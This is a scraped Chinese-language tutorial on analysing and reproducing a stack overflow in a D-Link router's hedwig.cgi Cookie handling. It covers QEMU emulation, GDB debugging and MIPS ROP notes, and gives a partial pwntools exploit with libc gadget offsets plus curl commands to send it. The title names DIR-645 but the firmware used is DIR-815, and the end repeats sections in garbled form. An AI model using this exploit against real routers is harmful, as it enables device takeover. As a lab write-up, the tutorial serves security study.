DLink DIR-645路由器栈溢出漏洞分析与复现教程<\/h1>

1. 准备环境<\/h2>

1.1 固件获取与解压<\/h3>

下载DIR-815固件：DIR-815_FIRMWARE_1.01.ZIP<\/code><\/li>

使用binwalk解压固件：
binwalk -e DIR-815_FIRMWARE_1.01.ZIP
<\/span><\/span><\/code><\/pre><\/li>
解压后得到MIPS32小端序文件系统（通过检查\/bin\/busybox<\/code>确认）<\/li>
<\/ul>
1.2 QEMU模拟环境搭建<\/h3>


下载MIPS架构内核镜像和文件系统：<\/p>

访问：Index of \/~aurel32\/qemu\/mipsel<\/code><\/li>
<\/ul>
<\/li>

创建QEMU启动脚本run.sh<\/code>：<\/p>
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=\/dev\/sda1 console=tty0"<\/span> -net nic -net tap -nographic
<\/span><\/span><\/code><\/pre>
默认登录凭证：root\/root 或 user\/user<\/li>
<\/ul>
<\/li>

网络配置：<\/p>

宿主机创建网卡脚本net.sh<\/code>：
#!\/bin\/sh
<\/span><\/span><\/span><\/span>sudo tunctl -t tap0 -u `<\/span>whoami`<\/span>
<\/span><\/span>sudo ifconfig tap0 192.168.100.1\/24
<\/span><\/span><\/code><\/pre><\/li>
QEMU虚拟机内配置脚本net.sh<\/code>：
#!\/bin\/sh
<\/span><\/span><\/span><\/span>ifconfig eth0 192.168.100.2 netmask 255.255.255.0
<\/span><\/span>route add default gw 192.168.100.1
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

文件传输：<\/p>

压缩文件系统：tar -czvf squashfs-root.tar.gz squashfs-root\/<\/code><\/li>
宿主机启动HTTP服务：python3 -m http.server 8000<\/code><\/li>
QEMU内下载：wget http:\/\/192.168.100.1:8000\/squashfs-root.tar.gz<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
2. 漏洞分析<\/h2>
2.1 漏洞定位<\/h3>

漏洞文件：\/htdocs\/web\/hedwig.cgi<\/code>（实际是\/htdocs\/cgibin<\/code>的软链接）<\/li>
关键函数调用链：
main → hedwigcgi_main → cgibin_parse_request → sess_get_uid
<\/code><\/pre>
<\/li>
<\/ul>
2.2 漏洞原理<\/h3>


Cookie解析<\/strong>：<\/p>

从HTTP_COOKIE<\/code>环境变量中提取uid=<\/code>后面的内容<\/li>
示例：Cookie: uid=AAAAAAAA...<\/code><\/li>
<\/ul>
<\/li>

栈溢出点<\/strong>：<\/p>
char<\/span> v27[0x400<\/span>]; \/\/ 缓冲区大小1024字节
<\/span><\/span><\/span><\/span>sprintf(v27, "<%s>%s<\/%s>"<\/span>, v6, v6, v6); \/\/ 第一次格式化
<\/span><\/span><\/span><\/code><\/pre>
如果满足条件会执行第二次sprintf<\/code>，导致双重溢出<\/li>
<\/ul>
<\/li>

触发条件<\/strong>：<\/p>

必须存在\/var\/tmp<\/code>目录（需手动创建）<\/li>
需要设置REQUEST_URI<\/code>环境变量<\/li>
POST请求内容需符合特定格式<\/li>
<\/ul>
<\/li>
<\/ol>
3. 漏洞利用<\/h2>
3.1 MIPS架构特性<\/h3>


叶子函数与非叶子函数<\/strong>：<\/p>

叶子函数：不调用其他函数，返回地址存储在$ra<\/code>寄存器<\/li>
非叶子函数：调用其他函数，返回地址保存在栈上<\/li>
<\/ul>
<\/li>

寄存器保存<\/strong>：<\/p>

非叶子函数会在prologue保存$s0-$s7<\/code>和$fp<\/code>到栈上<\/li>
栈溢出时可控制这些寄存器<\/li>
<\/ul>
<\/li>

流水线效应<\/strong>：<\/p>

分支延迟槽：跳转指令后的指令会先执行<\/li>
缓存不一致性：需调用sleep<\/code>让shellcode从数据缓存同步到指令缓存<\/li>
<\/ul>
<\/li>
<\/ol>
3.2 动态调试<\/h3>


用户模式调试<\/strong>：<\/p>
# 生成测试payload<\/span>
<\/span><\/span>cyclic 2000<\/span> > payload
<\/span><\/span>
<\/span><\/span># 执行测试<\/span>
<\/span><\/span>INPUT=<\/span>$(<\/span>cat payload)<\/span>
<\/span><\/span>export REQUEST_URI=<\/span>"\/"<\/span>
<\/span><\/span>export CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span>
<\/span><\/span>export HTTP_COOKIE=<\/span>"uid=<\/span>$INPUT"<\/span>
<\/span><\/span>echo $INPUT | chroot . .\/qemu-mipsel -E REQUEST_URI=<\/span>\/ -E CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span> -E HTTP_COOKIE=<\/span>"uid=<\/span>$INPUT"<\/span> -g 1234<\/span> \/htdocs\/cgibin
<\/span><\/span><\/code><\/pre><\/li>

GDB调试命令<\/strong>：<\/p>
gdb-multiarch htdocs\/cgibin
<\/span><\/span>target remote :1234
<\/span><\/span>b *hedwigcgi_main
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.3 ROP链构造<\/h3>


纯ROP利用<\/strong>：<\/p>

注意system<\/code>地址末位\x00<\/code>会被截断<\/li>
解决方法：传入system_addr-1<\/code>，通过addiu ..., 1<\/code>调整<\/li>
<\/ul>
<\/li>

ROP+Shellcode<\/strong>：<\/p>

必须避免shellcode中包含\x00<\/code><\/li>
需要先调用sleep<\/code>解决缓存不一致问题<\/li>
<\/ul>
<\/li>
<\/ol>
3.4 系统模式利用<\/h3>


方法一：直接传payload<\/strong>：<\/p>

使用gdbserver调试：
.\/gdbserver.mipsel 192.168.100.2:6666 \/htdocs\/cgibin
<\/span><\/span><\/code><\/pre><\/li>
示例exp：
# 构造ROP链和shellcode<\/span>
<\/span><\/span># 发送payload到目标<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

方法二：HTTP报文攻击<\/strong>：<\/p>

配置http_conf<\/code>服务<\/li>
发送精心构造的HTTP请求到192.168.192.133:1234<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
4. 完整利用流程<\/h2>
4.1 准备工作<\/h3>

创建\/var\/tmp<\/code>目录<\/li>
配置必要的环境变量：
export REQUEST_URI=<\/span>"\/"<\/span>
<\/span><\/span>export CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 构造Payload<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>
<\/span><\/span># libc基址偏移<\/span>
<\/span><\/span>libc_base =<\/span> 0x2aaf8000<\/span>
<\/span><\/span>
<\/span><\/span># gadget计算<\/span>
<\/span><\/span>system =<\/span> libc_base +<\/span> 0x53200<\/span> -<\/span> 1<\/span>  # 减1避免\x00<\/span>
<\/span><\/span>addiu_s0_1_jr_s0 =<\/span> libc_base +<\/span> 0x31A44<\/span>
<\/span><\/span>sleep =<\/span> libc_base +<\/span> 0x4D330<\/span>
<\/span><\/span>
<\/span><\/span># ROP链构造<\/span>
<\/span><\/span>rop =<\/span> b<\/span>""<\/span>
<\/span><\/span>rop +=<\/span> p32(addiu_s0_1_jr_s0)
<\/span><\/span>rop +=<\/span> p32(system)
<\/span><\/span>rop +=<\/span> b<\/span>"cmd<\/span>\x00<\/span>"<\/span>
<\/span><\/span>
<\/span><\/span># 填充缓冲区<\/span>
<\/span><\/span>payload =<\/span> b<\/span>"A"<\/span>*<\/span>1024<\/span>  # 偏移量需根据实际情况调整<\/span>
<\/span><\/span>payload +=<\/span> rop
<\/span><\/span><\/code><\/pre>4.3 执行攻击<\/h3>
# 方法一：直接传payload<\/span>
<\/span><\/span>echo -ne "uid=<\/span>$payload"<\/span> | chroot . .\/qemu-mipsel \/htdocs\/cgibin
<\/span><\/span>
<\/span><\/span># 方法二：通过HTTP<\/span>
<\/span><\/span>curl -X POST -H "Cookie: uid=<\/span>$payload"<\/span> http:\/\/192.168.192.133:1234\/hedwig.cgi
<\/span><\/span><\/code><\/pre>5. 参考资源<\/h2>

MIPSROP工具：https:\/\/github.com\/tacnetsol\/ida<\/li>
QEMU镜像：Index of \/~aurel32\/qemu\/mipsel<\/li>
gdbserver：对应架构的gdbserver.mipsel<\/li>
<\/ol>
注意事项<\/h2>

用户模式下无法使用fork()<\/code>，需在系统模式下测试<\/li>
确保所有环境变量正确设置<\/li>
注意MIPS架构的特殊性（流水线效应、缓存不一致等）<\/li>
实际偏移量需通过动态调试确定<\/li>
<\/ol>

DLink DIR-645路由器栈溢出漏洞分析与复现教程<\/h1>

1. 准备环境<\/h2>

2. 漏洞分析<\/h2>

3. 漏洞利用<\/h2>

4. 完整利用流程<\/h2>

注意事项<\/h2> 用户模式下无法使用fork()<\/code>，需在系统模式下测试<\/li> 确保所有环境变量正确设置<\/li> 注意MIPS架构的特殊性（流水线效应、缓存不一致等）<\/li> 实际偏移量需通过动态调试确定<\/li> <\/ol>

注意事项<\/h2>

用户模式下无法使用`fork()<\/code>，需在系统模式下测试<\/li>`
`确保所有环境变量正确设置<\/li>`
`注意MIPS架构的特殊性（流水线效应、缓存不一致等）<\/li>`
`实际偏移量需通过动态调试确定<\/li> <\/ol>`